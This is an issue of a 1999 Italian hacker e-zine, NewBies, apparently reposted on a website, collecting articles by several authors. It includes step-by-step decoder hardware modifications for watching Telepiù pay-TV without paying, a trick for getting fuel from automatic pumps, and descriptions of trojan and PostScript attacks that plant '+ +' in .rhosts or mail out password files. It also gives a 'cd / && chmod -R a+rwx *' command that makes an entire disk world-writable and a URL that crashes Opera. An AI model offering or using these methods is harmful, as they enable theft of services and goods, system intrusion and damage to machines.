- - - - due metodi facili facili - - - -

Questi metodi sono tutti seri. Non sono semplci voci di corridio. Sta roba
funziona.

ATTENZIONE: esistono sicuramente metodi piu' scientifici per decriptare
telepiu' terrestre. Un anno fa circa ho conosciuto un tipo che
per L. 250.000 mi vendeva un kit (che ho visto funzionare) che
permetteva di decriptare telepiu'. Visto che i componenti erano
abbastanza economici e il lavoro era fattibilissimo ho deciso di
cercare ancora per Internet questi benedetti schemi ma non li ho
mai trovati.
( Chiunque voglia mettersi in contatto con me: JohnnyRunner@usa.net in chat
su #hackernow o #linux)

METODO 1) Questo metodo e' l'unico che io conosca che permette di vedere e
sentire tele+.
Funziona solo su modelli ComCrypt 4000 prima serie cioe' comprati fra il
dicembre '95 e il luglio '96. Molti di questi decoders sono poi stati
ritirati e revisionati . . . . (porca tr**a!)

Ecco la procedura:
- sintonizzate sul 1mo canale la frequenza di Telepiu' (se il decoder non e'
attivo apparira' E3o E0 )
- scollegate l'antenna
- premete il tasto - per tornare indietro con i canali ( apparira'
la scritta rr)
- ricollegate l'antenna
- godetevi il film o la partita Per cambiare da +1 a +2 va eseguita la
stessa procedura"


Questo funziona solo con alcuni decoder siglati ComCrypt 4000. Non pensate
di comprare un decoder apposta per provare: moltissimi decoder sono stati
ritirati e riprogrammati per correggere 'sto bug (ovviamente il mio e' uno
di quelli che non funziona). Almeno dieci persone mi hanno detto pero' che
funzioni (sul decoder giusto). Se avete un decoder in cantina a prendere
polvere potete sempre provare!


METODO 2) Questo metodo consiste nel fottere il segnale video criptato.
Conosco la procedura solo per i decoders CableCrypt. Non e' applicabile
(almeno: io non ci sono riuscito) sui decoder Comcrypt 4000 (sara' per
"par condicio"????)

Ecco come fare:
1. Smontate il decoder fino a quando riuscite ad estrarre il circuito
stampato del decoder. Ora localizzate sul decoder un integrato grosso
siglato delta 5.x (o comunque l'unico integrato a 40 pin presente nel
circuito)

Dalla parte delle saldature vi troverete qualcosa del genere:

40 21
---------------------------
] |
---------------------------
1 20

- Localizza il pin 18 dell'integrato IC503 (o simile) e gratta via con un
taglierino o un coltello il rame della pista da entrambe le parti.
- Localizza il pin 23 dell'integrato IC503 (o simile) e gratta via il rame
sulla sinistra (questo dalla parte del microcontroller: insomma . . .
rigirate il tutto)
- Localizza il pin 32 e 33 e gratta via il rame da entrambi i lati.
- Localizza il pin 23 (si' quello di prima) e saldaci un filo, poi collegalo
al ground (puoi usare lo spazio vuoto del J835, guarda il lato componenti).

(traduzione del testo di Peter "The Video Ripper" disponibile sul sito di
Republic)

Non vorrei aver sbagliato . . . ca**o! Be' ecco la versione in lingua . .

- Be sure that all the metal tops are removed from the processor-box.
- Locate pin 18 of IC503 and scratch away the copper on both sides.
- Locate pin 23 of IC503 and scratch away the copper on the left,
this is the side of the micro-controller.
- Locate pins 32 and 33 and scratch away the copper at both.
- Locate pin 23 again and place a piece of solid core wire between pin 23
and ground (you can use the empty space of J835, see component side).

Io ho un ComCrypt 4000 e non ci sono riuscito . . sigh sigh . . .
Comunque quelli di Republic mi sembrano tipi seri e disponibili. Provate su
un modello CableCrypt (dovrebbero essere i primi modelli usciti) e
probabilmente avrete piu' fortuna di me.

Ahhh! ho trovato un indirizzo! Dovrebbe essere l'home page di Peter
"The Video Ripper" ecco qua:
http://home.pi.net/~pluijer (non so se funziona ancora)

Be' l'articolo sta per finire. Chiunque voglia scrivermi la mia mailbox:
JohnnyRunner@usa.net Se qualcuno ha info serie sulla Tv via satellite
(non solo t+) e terrestre si faccia sentire!!
Tanti saluti e baci.

JohnnyRunner

"Il mio futuro e' nel passato e nel presente" Litfiba

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

BENZINA A GO G0!
oVvEro
devo fare benzina ma non ho soldi...


Se per caso dovesse capitarvi di trovarvi con la macchina o con la moto
senza benza e con poche migliaia di lire potete provare il seguente
"trucchetto" ai distributori automatici.

Dopo aver aperto il bocchetto della macchina (o moto) dove si inserisce la
benzina, prendete la pompa e tenendo premuta la leva per farla scorrere,
saltateci sopra ripetutamente ed energicamente. Con un po' di pazienza pian
piano farete benzina grazie alla pressione che si viene a creare saltando
sulla pompa (un mio amico, con una vecchia pompa, si è fatto il pieno di
benzina dello scooter in circa 15 minuti!!!).
Con i tipi di pompe che hanno il cassettino che raccoglie la benzina posto
sopra (come il disegno di seguito) sono quelle da cui si puo' attingere piu'
benzina dato che scende direttamente dall'alto.

.-------------.
[]]]]]]]]]]| lire 88888 |
[] | litri 88888 |
[] .----------.--|
[] | |
[] | |
[] | |
[] | |
||__ | |
||_'| .------------.--|
|| / |-| |-| |-| |
() | | | | | | | |
() | |_| |_| |_| |
| |
.----------------.

Occhio pero' a non farvi prendere per pazzi da chi passa dato che vi vedra'
saltare come dei dannati! ;-)

HarLoK

Spazio saluti: tutti quelli che mi conoscono, la mia compagnia nonche' quella
di sballo e i soliti Blinking, 3ph4Throx! Terror Keeper, Lord
Of Destruction, Dante Alighieri, Nobody88, la Spaghetti
Phreakers crew, Rigor Mortem, Devilnet, N0SF3RATU, CDP, Blum,
compresi tutti gli altri) K->


ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ BREVE E SEMPLICE LISTA DI ATTACCHI BASATI SU DATI ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ciao a tutti io mi kiamo KarmAYogA e, come avrete capito ho scelto questo
nick proprio xche' nella mia vita ogni cosa anke la piu' piccola cerco sempre
di farla al massimo delle possibilita' e non metto mai un limite al possibile
dato che come diceva qualcuno "Non credevo che era impossibile quando lo
feci!!!"
. Andro' a scrivere questo breve articolo che spero sia utile a piu'
gente possibile e se volete contattarmi scrivete a N0body88 che mi girera'
tutte le decine di mail che ricevero' =)
Questo tipo di attacchi, detta data driven, sono molto difficili da
individuare a causa delle loro modalita' ed i vari firewall servono a ben
poco contro questo tipo di attacchi. Faro' adesso una breve lista di esempi
x definire meglio questa modalita' x attaccare che si basa piu' sul social
engineering e sulla speranza che l'utente "bersagliato" sia ignorante, che
non sul fatto di usare strane o nuove tecniche x sperimentare l'effettiva
sicurezza di alcuni sistemi.

Esempio numero 1:

|__|> l'hacker / newbies si prepara un file pdf o postscript da usare x
eseguire cose non molto belle sul pc dei poveri utenti creduloni.
|__|> l'hacker / newbies manda una email ad un utente con, come attachment,
un file postscript che sembra essere normale ma che invece andra'
ad eseguire operazioni sui file senza che l'user se ne accorga.
|__|> l'user, ignaro di tutto, eseguira' subito il file postscript.
|__|> l'interprete postscript esegue le operazioni contenute nel file che
aggiungono la voce "+ +" nel file .rhosts dello user.
|__|> l'hacker / newbies esegue un rlogin sulla macchina dell'utente.

Esempio numero 2:

|__|> un utente scarica da un sito HTTP un file eseguibile.
|__|> l'utente esegue il file sul proprio pc.
|__|> il programma cancella tutti i file contenuti sulla macchina dell'utente
oppure compie solamente delle operazioni malicious e manda x esempio una
mail all'hacker/newbies contenente le password dell'ignaro utente.
|__|> il programma immette un virus all'interno della macchina dell'utente
se chi ha fatto il programma e' chi lo da in giro a questo scopo e' un
lamer e lamer rimarra' finche non cambia filosofia.

Esempio numero 3:

|__|> un utente scarica da un sito FTP un file eseguibile
|__|> l'utente esegue il file sul proprio pc.
|__|> il programma cancella tutti i file contenuti sulla macchina dell'utente
oppure compie solamente delle operazioni malicious e manda x esempio una
mail all'hacker/newbies contenente le password dell'ignaro utente.
|__|> il programma immette un virus all'interno della macchina dell'utente
se chi ha fatto il programma e' chi lo da in giro a questo scopo e' un
lamer e lamer rimarra' finche non cambia filosofia.

Esempio numero 4:

|__|> questa cosa si vede moooolto spesso... su IRC qualcuno dice ad uno nuovo
e un po' inesperto come ottenere un programma che: 1) lo aiutera' ad
usare meglio il sistema oppure 2) lo fara' diventare un hacker in pochi
secondi o 3) lo aiutera' a buttare giu0 chiunque in poki sec (tipo nuke)
|__|> l'utente quindi attirato dalla proposta fatt si fara' passare il
programma (con grn gioia del lamer) e lo eseguira'
|__|> il programma cancellera' tutti file dello user e inviera' per email una
copia del file delle password all'intruso (/etc/shadow o /etc/passwd)
oppure si installera' nel sistema sotto forma di sniffer, x raccogliere
password, sotto forma di trojan x aprire una porta, sotto forma di

Esempio numero 5:

|__|> in una pagina Web vi e' un bottone che dice "cliccare qui per infettare
una macchina"
(esiste veramente!) Questo e' il piu' stupido ma quant'e'
vero iddio che esist ci posso mettere la mano sul fuoco xche' l'ho visto
io su geocities ma adesso non c'e' piu' dato che andando giu' di brute
force ho trovato la pass ho cancellato virus e pagine web e ho cambiato
la pass...ognuno aiuta gli altri a modo suo ;)

Byez Byex Byey
KarmA_YogA
"Cosa usi x hackare? io??? Uso la testa !!!!!!!!"
Webmaster e Sysadmin of www.nonvelodico.it

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

-------------------------------------------------------------------
MP3 in auto: Fantasie oltre la realta'
-------------------------------------------------------------------

INGREDIENTI: un pc 486 da rottame e una scheda audio 16 bitz
TEMPO PREVISTO: uggioso

Eila' . .. tutto K?
In questo articolo vorrei parlare di mp3: come portarli comodamente (?) in
auto. Ormai tutti sanno che cosa sono gli Mp3, che software usare,
tricchetracche . . OK.
Frequentando un po' il newsgroup it.hobby.elettronica ho visto che
qualcuno ha gia' messo un Pc in auto (collegato all'autoradio) per
ascoltare Tanta musica ad alta qualita'.
L'URL di questo studente di elettronica e' __________________
(mi raccomando . . . e' da visitare).
In pratica in questo sito si vede il progetto di questo ragazzo (di cui
non ricordo il nome) che e' riuscito a a mettere un Pentium in auto
alimentandolo con un inverter 12/220. Per quanto riguarda i comandi e'
stata adattata una tastiera ricavata da un laptop che e' stata collocata
nelle vicinanze dello specchietto retrovisore. La sera stessa
in cui ho dato un'occhiata al suo sito ho dormito poco esaltato da questo
fantastico progetto.
Ho pensato che, tutto sommato, occorre spendere non pochi soldi.
Innanzitutto un Pc Pentium (anche 133, ma un pentium), poi un circuito
inverter per elevare la tensione da 12 V in continua a 220 V in alternata
necessaria al pc per funzionare correttamente.
In questo articolo mi piacerebbe "fantasticare" un po' su come risparmiare
un po' di soldi e avere ugualmente un buon impianto Mp3 in auto.
Ecco quanto.

LE TENSIONI

Facendo 4 conti un inverter costa + o - L. 180.000 (azzz. . ..) e , a mia
opinione, non e' molto conveniente. Certo che e' comodo, ma non costa
poco e non consuma poco.

Ecco lo schema delle tensioni

AUTO | PC |scheda madre
=================
12V ------------------> 220V ------------------> | +5,-5,+12,-12 |
CC CA ======= CC ======
INVERTER ALIMENTATORE sw

(CA= corrente alternata; CC=corrente continua)

In pratica, utilizzando un inverter, si passerebbe per i 220V
canonici senza trarne alcun profitto.
Se solo si riuscisse a ottenere i voltaggi appositi (+5,-5,+12,-12)
si potrebbe ottenere un risparmio notevole di spazio levando
l'alimentatore del PC. Inoltre il consumo di tutto l'impianto si
ridurrebbe drasticamente.
Per ottenere i voltaggi +5 e +12 non ci sono problemi, per quanto riguarda
il -5 non ci dovrebbero essere gravi problemi: ma per -12?????
(Ahhh!! Dimenticavo! +5,-5,+12,-12 V sono le tensioni necessarie alla
scheda madre per alimentare tutte le periferiche del PC)
Evitando di collegare le tensioni negative (-5 e -12 V) sicuramente il
computer dovrebbe essere in grado di fare il boot, visto che l'Hdd
utilizza solo la +12. Il problema + grande e' che la scheda audio non
funzionerebbe correttamente riproducendo un suono in mono oppure, nei casi
piu' cronici, non funzionando del tutto.

Un'altra cosa che mi incuriosisce riguardo l'inverter e' il consumo di
questo circuito.
Quando ho visto il progetto di ________ mi sono accorto che tutto
l'impianto MP3 era alloggiato in una Jeep (diesel) e quindi penso che lui
non abbia avuto particolari problemi di alimentazione. Ma ve l'immaginate
tutto quell'impianto sulla mia povera Uno 1000 ??? Secondo me dopo circa
40 secondi di utilizzo l'alternatore (sempre in funzione) si
riufiuterebbe di collaborare con la batteria visto il carico
Inverter+Alimentatore+Pc+Autoradio+Amplificatori !
Secondo me trovare una soluzione alternativa all'inverter sarebbe una gran
cosa. Purtroppo le mie poche e povere nozioni di elettronica non mi
permettono di far altro che aspettare qualche aiuto da Voi!
Ricordo comunque le tensioni necessarie per un corretto funzionamento:
+12,+5,-12,-5 V : chissa' se qualche lettore di newbies puo' darmi una mano!
(o un'idea)

Se solo si riuscisse a trovare questo aggeggino si potrebbe procedere
cosi': (questa e' quasi pura fantasia!)


contatti > __________________________________ <-- SchedaAudio/V
_______________| |_____________________________< ----- Scheda Madre


Si potrebbe sfilare la scheda audio dallo slot ISA e appoggiare la scheda
audio sulla scheda madre fissandola adeguatamente.
Saldando i contatti dello slot ISA ai contatti della scheda audio si
risparmierebbe un casino di spazio!!
Se la scheda madre ha l'audio integrato, ovviamente, tutto cio' non e'
necessario. Tuttavia la scheda video deve essere ugualmente connessa alla
MoBo poiche' il bios fa un Check prima di far partire il Pc. Quindi si
dovrebbe ripetere la stessa operazione anche per la scheda video perche'
altrimenti il Pc non partirebbe (sigh sigh). . . . . Qualche idea per
togliere la Scheda Video??? Booooooooooo

Vorrei provare questa "tecnica" dissacrando un vecchio 486 con 8
Mega di Ram senza CD e con un HD removibile da 2,1 Gb (il piatto forte
del PC!) : chissa' se ci riusciro'!

Be' questa era la parte piu' fantasiosa dell'articolo . . . ora la parte un
po' piu' seria.

CONFIGURAZIONE HARDWARE / SOFTWARE

Secondo la mia opinione spendere un sacco di soldi per un impianto in
macchina non vale la pena. Un buon vecchio 486 con 8 Mega di Ram potrebbe
essere un buon affare e funzionare egregiamente.
Come sistema operativo si potrebbe utilizzare mulinux (una mini
distribuzione di linux) installata su Hdd.
In alternativa si potrebbe ricompilare un kernel datato (sempre linux) che
comunque supporta una SB 100% compatibile. Il kernel un po' vecchiotto
garantirebbe il funzionamento dei programmi appositi senza la necessita'
di avere svariati mega di ram o un processore pentium.
Una configurazione ottimale del OS e' comunque essenziale per la buona
riuscita del progetto. Per il sw di utilizzo il grezzo mpg123 o il piu'
aggraziato (ma non troppo) freeamp potrebbero andare bene.
Da dimenticare (con questa configurazione) programmi + complessi come
x11amp o roba simile.
Se non siete pratici con linux si potrebbe ottenere lo stesso risultato
installando un Dos (meglio se FreeDos) e installare la versione apposita
di Winamp per questo sistema operativo (non l'ho ancora vista ma so che e'
in giro . . . probabilmente sul sito di Winamp (ma va??))

Be' per anche per questa volta e' tutto. Se ci sara' un seguito a
questo articolo e' perche' sono riuscito a fare qualcosa di pratico.
Ringrazio Sammy Power per la collaborazione pratica al progetto --- MP3
Fantasy ---.
Ogni e-mail in proposito e' gradita all'indirizzo JohnnyRunner@usa.net
In chat mi si trova verso le 19.00 o piu' tardi verso le 23.00
Ciao belli!

JohnnyRunner

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ L'Uov0 De ColombO ! ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Beh...mini articolo per scrivere un piccolo trucchetto di cui
all'inizio pochi conoscono l'esistenza....

deD to: Poll!...alle mie spalle che mi corregge l'articolo in realtime
Vs-DeD to:Il treno che alle 16:00 parte...che balle !

Bene...avete un'account su di una freeshell...volete uploadarci
un azzo di file ma l'ftp non c'Š...come fare ???
Aprite il file con il sorgente del file che volete uplodare
con il normale notepad selezionate tutto il testo ed ora clickate
col destro e scegliete copia.
Entrate nella vostra shell, editate un nuovo file con o un qualsiasi
altro editor di testo ed incollate il tutto...salvate il file con
estensione .c chiudete e poi con gcc o cc o che caxxo volete
compilatelo.... ( gcc -o cax.c cax ) ed avrete l'eseguibile
di cax....'na stronzata....bye byeeeeee.....D4NT3 4L|GH|3R| !!!!!


ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ QUALKE TRUCCO BY PIPPO CALO' ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

1) MINI GUIDA A COME SPROTEGGERE TUTTO IL DISCO E FARE INCAZZARE IL ROOT ;)

Questo per sproteggere tutto da tutti da questa directory giu' sotto per
tutto l'albero (cioe' tutti i file e le dir degli *nix NOTA BY N0bodY88):

chmod -R a+rwx *

cd / && chmod -R a+rwx *
Anke con questo comando infatti (sono equivalenti) si puo' sproteggere tutto
il disco (ma solo se si e' root!!!)

2) MINI GUIDA A && E ||

COMANDOA && COMANDOB --> esegue il comando B solo se e' riuscito ad eseguire
il comando A
COMANDOA || COMANDOB --> esegue il comando B solo se NON e' riuscito ad
eseguire il comando A

3) MINI GUIDA CON PRECISAZIONI SUI FILE .RHOSTS

Il file .rhosts deve essere protetto PERLOMENO da scrittura contro g e o.
Altrimenti non funziona l'entrata in remote.
Temo anche che debba essere protetto da lettura.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ UN PO' TRUCCHI CAZZATE E STRONZATE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ciao a tutti questo e' il vs N0bodY88 che vi parla dal suo portatile datogli
in dotazione da una ditta che evidentemente se ne intende di pazzi hihihi.
In queste poche righe vi daro' alcuni consigli non difficili e di sicuro non
inediti ma che forse possono risultare utili. Eccoveli divisi in punti:

1) Immaginate di aver trovato posto in un azienda dove avete la vostra
scrivania e il vostro telefono personale ma che si collega ad un centralino:
ebbene come fare x connettersi ad internet? Per "scavalcare" (diciamo) il
centralino basta far precedere il numero telefonico del vs provider nella
vostra connessione di acceso remoto uno zero con due virgole. Esempio:
--> connessione da casa --> 06880000
--> connessione dall'ufficio --> 0,,0688000
Semplice no ;)

2) come collegare 2 computer che non hanno schede di rete? Allora la soluzione
e' semplice basta munirsi di un semplice cavetto uplink che andra' a
connettere i due pc ( ovviamente =) ) sulla porta com1 o, tramite adattatore,
alla com2 dopodiche' bastera' mandare in esecuzione su entrambi i pc collegati
un programmino che si chiama LL3 e che potete trovare allegato al cavo seriale
o che potete cmq procurarvi facilmente o sulla rete o mediante qualke amico
smnanettone che abbia anke un minimo interesse sulle reti. Nel programma
sopracitato LL3 basta:
--> premere L e poi premere invio x muoversi dentro e fuori le varie dir
--> premere C e poi premere invio x copiare file da un pc all'altro
--> premere E e poi premere invio x cancellare dei file
CONSIGLIO: se uno dei due pc e' un 486 e'

  
consigliabile copiare un file alla
volta...lo so...e' un po' na menata pero' cosi' non si impalla a
causa della differenza di velocita' dei due pc... ;)

3) cosa fare nei momenti di noia in rete quando gli amici non ci sono e di
hackare non c'avete la testa? Semplicemente passarsi sotto teleport i vari
www.softpj.com e www.spippolatori.com senza lasciare neanche una immagine
che poi se se ne accorgono vi fanno a fette hihihi e ricodate che noi
impariamo x creare e non per rompere o cancellare.

4) ATTENZIONE !!! Se girate su irc state attenti che c'e' un buontempone che
va in giro e domanda "vuoi vedere un mio video" il che non sarebbe rompiballe
senonche' il video mandato da questo fantomatico simpaticone si rivela essere
un file chiamato patch.exe che potete immaginare cos'e'...cmq il consiglio e'
il solito okkio a non aprire niente che derivi da sconosciuti e okkio ai "re
degli hacker"
come questo =)
tnx speciale a dante x la segnalazione di questo "pericolo pubblico" hihihi

5) Cosa e' un array ? So che e' una cazzata ma dato che ultimamente me l'hanno
gia' chiesto in tre o quattro e quindi... Gli array sono strumenti utilizzati
x memorizzare gruppi di elementi in una singola unita'. Gli array quindi
sono in pratica degli insiemi di elementi aventi una comune caratteristica.
Immaginate di fare un programma nel vostro linguaggio di programmazione
preferito e di dover immettere in un database decine se non centinaia di dati
dello stesso tipo (variabili numeriche, variabili di testo etc.)...cosa
fate? Fate decine di dichiarazioni oppure (e qui vengono in aiuto gli array)
create con una unica dichiarazione un insieme di dati che contiene tutti i vs
dati in un unico array :)

6) Non dormite la notte all'incubo che qualcuno vi incul... vi invada l'orifice
con qualke trojan o che vi entri nel vs win preferito e che vi formatti tutto?
Niente paura c'e' un trucco semplicissimo x evitare questo e x dormire sonni
tranquilli... tutto questo puo' essere infatti evitato con un passo
semplicissimo ma anke un po' ingegnoso (e che, ci tengo a precisarlo, non lo
ho inventato io e credo lo sappiano gia' in tanti). Basta infatti andare nella
nostra cartella c:\windows\command e rinominare il ns buon vecchio format.com
in formatt.com o cax.com o quellochevolete.com...sta a voi decidere e buone
nottate ;)
PS: si ringrazia Yago - Eugenio per avermi arrichito la conoscenza con questo
trucchetto semplice (se non lo sai ;) ma moooooooooolto efficace.

7) Ed ora un piccolo trcchetto x quelli che creano e programmano in java e
hanno appena cominciato e stanno usando un compilatore sotto dos. Il trucco
consiste nel mettere le seguenti linee in un file e chiamarlo a.bat dopodiche'
basta che quando volete provare un progetto appena finito basta che digitiate
il comando "a nomemioprogetto" e uala'! ci siamo risparmiati un bel po' di

------inizio copiaincolla--------------------
@echo off
cls
path c:\jbuilder\java\bin
c:\jbuilder\java\bin\javac.exe %1.java
c:\jbuilder\java\bin\appletviewer.exe %1.html
------fine copiaincolla----------------------

!!!!!!ATTENZIONE IL PROSSIMO TRUCCO NON E' MIO MA E' UNA TRADUZIONE!!!!!!
8) Come mandare in crash il "famoso" browser web Opera? Ebbene basta
una piccola cosa x far andare in crash sudetto programma e consiste
nell'aggiungere un ulteriore slash a un qualsiasi indirizzo web.
Piccolo esempio: http:///

PS: non so pero' se nelle ultime versioni ci sia ancora questo bug
quindi che mi resta da dire oltre al fatto che l'autore del testo
che ho tradotto non e' riportato nel testo stesso? Ah si'...
...tentar non nuoce...e com dice un amico di un mio amico mooolto
maschilista (ma dire mooooolto e' dire poco) dice sempre "Tu vai
dalla ragazza lo tiri fuori dalle mutande e glielo metti in mano...
tanto qualsiasi cosa succeda non cade ;)

E anche questo numero il mio art su cazzate trucchi e stronzate e' finito...
...quindi.. ...byez a tutti dal vostro redivivo N0bodY88

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ SALUTI ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Dedico questa e-zine a K4m4l30nt3, colui con il quale ho iniziato questa
avventura e che ora non e' piu' tra noi.... dovunque tu sia questa e' per te
fratello _--={ ø(^__^)ø }=--_

Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma
non potete fermarci tutti... dopo tutto, siamo tutti curiosi uguali e con la
stessa voglia di smanettare e di capire.
+++Illo N0bodY88+++ January 16, 1999

Ok ora voglio fare anche io un mega salutone a Dark Schnaider [ complimenti
x il sito ] , Biavo , w00w00 e tutti gli altri amici mirc che frequentemente
vengono sul nostro beneamato canale #hackernow [ grazie di tutto cuore siete
mitici ] . Ah mi dimenticavo una cosa .... Fanculo ai Lamer siete esseri
immondi .... Come sono buono eh..

Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma
almeno aspettate che abbia fermato tutti i lamer di questo universo, dopo
tutto non siamo tutti uguali
ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
_ _ ____ _
| \ | | _____ _| __ )(_) ___ ___
| \| |/ _ \ \ /\ / / _ \| |/ _ Y __|
| |\ | __/\ V V /| |_) | | __|__ \
|_| \_|\___| \_/\_/ |____/|_|\___|___/

Webmaster by ---------> ZeroCool & T0rment0 & _p0nic0_ & HaRLoK & N0bodY88
Redattori ------------> N0bodY88 & ZeroCool & Dante Alighieri
E-zine by ------------> N0bodY88 & ZeroCool & NewBies Staff
Ascii by -------------> N0bodY88 & |-|15cR4zYm1nD & S0l1t4r10~M4N & 1mGvD
Loghi NewBies by -----> RigoR MorteM
Articoli -------------> NewBies Staff & Friends

|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-

Fine e-zine:

E anche questo numero e' giunto alla frutta quindi che dire...speriamo che vi
sia piaciuto...e ora un po' di cose...buon compleanno a Raffi Crash....un
grazie di cuore a drwxr-xr- x tutto il suo aiuto x NewBies e x la sua amicizia
dimostrata in vari modi...tnx in modo molto speciale sia a Yago il mito che a
RigoR MorteM che adesso mi ha pure trasmesso la passione x l'elettronica...
cax che figata raga...

N0bodY88

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos from Google Play

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
